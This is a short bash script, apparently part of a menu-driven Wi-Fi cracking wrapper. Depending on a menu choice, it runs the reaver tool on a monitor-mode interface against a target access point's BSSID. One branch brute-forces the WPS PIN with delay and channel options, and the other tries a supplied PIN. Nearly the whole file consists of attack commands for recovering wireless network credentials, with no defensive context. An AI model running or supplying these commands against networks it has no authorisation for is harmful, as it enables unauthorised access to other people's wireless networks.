#! /bin/bash
if [ "$GLV" = "2" ]
then
	echo -e "Please note that you need a very good signal for this to work."
	sleep 3
	echo -e "Starting..."
	sleep 1
	clear
	reaver -i wlan0mon -b $BSSIDT -d $DELT -S -N -c $CHANT -vv 
	echo -e "Press any key to continue..." 
	read
elif [ "$GLV" = "3" ]
then
	reaver -i wlan0mon -b $BSSIDT -p $WPST -vv
	echo -e "Press any key to continue..."
	read

fi
